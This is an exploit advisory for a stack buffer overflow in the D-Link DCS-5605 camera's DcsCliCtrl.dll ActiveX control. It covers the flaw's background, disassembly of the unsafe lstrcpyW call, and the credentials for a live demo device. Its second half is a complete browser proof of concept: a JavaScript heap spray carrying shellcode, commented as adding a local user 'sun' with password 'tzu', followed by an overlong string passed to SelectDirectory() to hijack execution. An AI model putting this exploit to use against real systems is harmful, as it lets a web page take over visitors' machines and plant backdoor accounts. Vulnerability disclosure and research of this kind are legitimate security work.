D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability tested against: Microsoft Windows Server 2003 r2 sp2 Internet Explorer 7/8 Live demo: http://203.125.227.70/eng/index.cgi username: dlink password: dlink product homepage: http://www.d-link.com/products/?pid=771 product description: "The DCS-5605 is a high performance camera for professional surveillance and remote monitoring. This network camera features motorized pan, tilt, and optical/digital zoom for ultimate versatility. The 10x optical zoom lens delivers the level of detail necessary to identify faces, license plate numbers, and other important details that are difficult to clearly distinguish using digital zoom alone" background: When browsing the device web interface, the user is asked to install an ActiveX control to stream video content. This control has the following settings: Description: Camera Stream Client Control File version: 1.0.0.4519 Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll ProgID: DcsCliCtrl.DCSStrmControl.1 GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245} Implements IObjectSafety: Yes Safe For Scripting (IObjectSafety): True Safe For Initialization (IObjectSafety): True Vulnerability: the ActiveX control exposes the SelectDirectory() method which supports one optional argument. See typelib: ... /* DISPID=22 */ /* VT_BSTR [8] */ function SelectDirectory( /* VT_VARIANT [12] [in] */ $varDefPath ) { /* method SelectDirectory */ } ... This method suffers of a stack based buffer overflow vulnerability because an unsafe lstrcpyW() call inside DcsCliCtrl.dll: ... 100712E0 81EC 34040000 sub esp,434 100712E6 A1 2C841010 mov eax,dword ptr ds:[1010842C] 100712EB 33C4 xor eax,esp 100712ED 898424 30040000 mov dword ptr ss:[esp+430],eax 100712F4 53 push ebx 100712F5 8B9C24 48040000 mov ebx,dword ptr ss:[esp+448] 100712FC 55 push ebp 100712FD 8BAC24 40040000 mov ebp,dword ptr ss:[esp+440] 10071304 56 push esi 10071305 8BB424 4C040000 mov esi,dword ptr ss:[esp+44C] 1007130C 57 push edi 1007130D 8BBC24 4C040000 mov edi,dword ptr ss:[esp+44C] 10071314 68 08020000 push 208 10071319 8D4424 34 lea eax,dword ptr ss:[esp+34] 1007131D 6A 00 push 0 1007131F 50 push eax 10071320 E8 0BC40300 call DcsCliCt.100AD730 10071325 83C4 0C add esp,0C 10071328 85F6 test esi,esi 1007132A 74 0C je short DcsCliCt.10071338 1007132C 56 push esi 1007132D 8D4C24 34 lea ecx,dword ptr ss:[esp+34] 10071331 51 push ecx 10071332 FF15 D4D20C10 call dword ptr ds:[<&KERNEL32.lstrcpyW>] ; kernel32.lstrcpyW <------------- ... An attacker could entice a remote user to browse a web page to gain control of the victim browser, by passing an overlong string to the mentioned method and overwriting critical structures (SEH). As attachment proof of concept code. Note, to reproduce the wanted crash: when the SelectDirectory() method is called the user is asked to select a destination folder for the stream recorder. To set EIP to 0x0c0c0c0c select a folder of choice, then proceed. When clicking Cancel you have an unuseful crash, however it could be possible that modifying the poc you will have EIP overwritten aswell. I think that it is also possible that other products might carry this dll, I could post an update if I find more. Additional note: 0:029> lm -vm DcsCliCtrl start end module name 08450000 0859e000 DcsCliCtrl (deferred) Image path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll Image name: DcsCliCtrl.dll Timestamp: Thu Aug 19 08:48:47 2010 (4C6CD3CF) CheckSum: 001325EC ImageSize: 0014E000 File version: 1.0.0.4519 Product version: 1.0.0.1 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type: 2.0 Dll File date: 00000000.00000000 Translations: 0409.04e4 ProductName: Camera Streaming Client InternalName: DcsCliCtrl.dll OriginalFilename: DcsCliCtrl.dll ProductVersion: 1.0.0.1 FileVersion: 1.0.0.4519 FileDescription: Camera Stream Client Control LegalCopyright: Copyright: (c) All rights reserved. <!-- D-Link DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability poc (ie7) Description: Camera Stream Client Control File version: 1.0.0.4519 Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll ProgID: DcsCliCtrl.DCSStrmControl.1 GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245} Implements IObjectSafety: Yes Safe For Scripting (IObjectSafety): True Safe For Initialization (IObjectSafety): True rgod --> <!-- saved from url=(0014)about:internet --> <html> please select a directory to download ... <object classid='clsid:721700FE-7F0E-49C5-BDED-CA92B7CB1245' id='obj' width=0 height=0 /> </object> <script language='javascript'> //add user one, user "sun" pass "tzu" shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" + "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" + "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" + "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" + "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" + "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" + "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" + "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" + "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" + "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" + "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" + "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" + "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" + "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" + "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" + "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" + "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" + "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" + "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" + "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" + "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" + "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" + "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" + "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" + "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" + "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" + "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" + "%u7734%u4734%u4570"); bigblock = unescape("%u0c0c%u0c0c"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0x40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<666;i++){memory[i] = block+shellcode} </script> <script defer=defer> var x = ""; for (i=0; i<200; i++){ x = x + unescape("%u4141%u4141"); } for (i=0; i<700; i++){ x = x + unescape("%u0c0c%u0c0c"); } obj.SelectDirectory(x); </script>